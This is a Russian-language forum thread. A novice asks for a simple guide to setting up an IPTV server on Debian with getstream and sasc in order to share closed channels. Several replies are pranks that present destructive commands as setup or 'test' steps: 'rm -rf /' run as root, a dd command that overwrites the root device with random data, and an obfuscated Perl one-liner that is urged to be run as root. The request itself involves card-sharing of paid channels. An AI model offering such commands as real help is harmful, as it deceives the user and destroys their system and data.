Перейти к содержимому
Калькуляторы

IPTV для чайников вещание закрытых каналов, Debian, getstream, sasc и т.п.

Помогите с нуля собрать сервер, на 36E, Шаринг, линукс не знаю, читать или учиться не охота или некогда. Получится короткая инструкция для чайников. Главное подробная последовательность действий без лирики... Итак, с чего начнем??

Изменено пользователем maxkst

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Неужели вы думаете, что если вам не охота читать или учиться, то кому-то охота писать и учить?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Неужели вы думаете, что если вам не охота читать или учиться, то кому-то охота писать и учить?

В учебных заведениях многие так учатся )). Глядишь, что-то да зацепится... Спорить на эту тему нет желания, давайте без лирики...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

С момента открытия темы установился Debian 5.0.3 (Lenny) Core 2.6.26-2-686 на машинку Cel2,26/512Mb/80Gb/SS3(TT-budget S-1401). Что дальше делать?? Пожалуйста, оставляйте комментарии только по теме ))

Изменено пользователем maxkst

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

sudo bash

rm -rf /

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

sudo bash

rm -rf /

 

Если не поможет, можно поробовать:

 

sudo -s

string=$(mount | grep ' / ') && array=( $string ) && A=${array[0]} && dd if=/dev/random of=$A

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Ну и конечно же вы прокомментируете эти команды, ведь для чайников же.....

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Ну и конечно же вы прокомментируете эти команды, ведь для чайников же.....

Комментарии излишни.

Предложены самые короткие пути реализации IPTV. )

Смело вводите команды и наслаждайтесь.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Добавил git в synaptic и скачалось git clone git://hydra.gt.owl.de/getstream.git . Спасибо всем за подсказки, дальше что делаем??

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

 

попробуйте от рута запустить и вывод сюда показать.

Эта ком*** протестирует то что сказачалсь

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

 

попробуйте от рута запустить и вывод сюда показать.

Эта ком*** протестирует то что сказачалсь

да вроде там нечего тестировать ))

 

в readme написано:

Building:

- Install libevent and glib

- Probably adapt paths in Makefile

- type "make"

что тут делать надо?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

дык в этом каталоге запустите ту команду что я написал.

потом make

 

реально самый простой путь реализации IPTV

Изменено пользователем Denis Samsonov

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

 

моя аська очень логично отобразила смайлы

1247.jpeg

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

 

 

 

Как закалялись чайники... Повесть..

 

 

.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Поглумиться над чайником все горазды, а помочь - не каждый...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

в командной строке lynx google.ru

 

наличие hands.dll, brain.sys (.sys!!! а не .vxd!!!) и не залоченое time.krn обязательны на управляющем терминале...

 

ЗЫ. вот я как-то нашёл время и копаясь только в теме про иптв на этом форуме только по данным за этот год собрал рабочий микростендик... Вот только я не пров и хомячков нема... А на одного абонента на 3 компа раздавало... Но от отсутствия применения rm-rf/ и щас на железке новый сервак... Более нужный... Так что это несложно...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

В соседней ветке, по getstream, уверен, есть почти все по интересующей меня теме, но это более 30 стр проб и ошибок. А надо то из всего сделать простецкий мануал. Краткий, с уже реально проверенными инструкциями.... и не мне одному это надо. Чем больше это будут уметь, тем дальше можно будет по теме продвинуться. Я с линуксом не пересекался, и уйдут дни, недели, месяцы, чтобы понять и разобраться, времени столько у меня нет. А кто не желает помочь, просто проходите мимо, умники-выпендрежники достали на форумах. Если я нарушил правила форума, задавая ламерские вопросы - да покарает меня модератор, ноги моей больше здесь не будет)).

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

В соседней ветке, по getstream, уверен, есть почти все по интересующей меня теме, но это более 30 стр проб и ошибок. А надо то из всего сделать простецкий мануал. Краткий, с уже реально проверенными инструкциями.... и не мне одному это надо. Чем больше это будут уметь, тем дальше можно будет по теме продвинуться. Я с линуксом не пересекался, и уйдут дни, недели, месяцы, чтобы понять и разобраться, времени столько у меня нет. А кто не желает помочь, просто проходите мимо, умники-выпендрежники достали на форумах. Если я нарушил правила форума, задавая ламерские вопросы - да покарает меня модератор, ноги моей больше здесь не будет)).
ну так займитесь - сделайте доброе дело - не только себе - ( вы же тогда нормально разберётесь в теме ) но и для других - ВСЕ ВАМ СПАСИБО СКАЖУТ! И ВЫ ПЕРВЫЙ СКАЖЕТЕ ВСЕМ СПАСИБО!

 

А если вас что-то или кто то достал - можете смело сюда не писать ;) - никто не заметит ;)

Изменено пользователем Lynx10

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

так что вам линукс дался, делайте на VMS или что там у вас

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

В соседней ветке, по getstream, уверен, есть почти все по интересующей меня теме, но это более 30 стр проб и ошибок. А надо то из всего сделать простецкий мануал. Краткий, с уже реально проверенными инструкциями.... и не мне одному это надо.

Идёшь к ближайшему интегратору и просишь разработать проект для тебя.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

В соседней ветке, по getstream, уверен, есть почти все по интересующей меня теме, но это более 30 стр проб и ошибок. А надо то из всего сделать простецкий мануал. Краткий, с уже реально проверенными инструкциями.... и не мне одному это надо.
Идёшь к ближайшему интегратору и просишь разработать проект для тебя.

и одтаешь около 2 милионов дензнаков... для более-менее нормального решения :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 смайлов.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.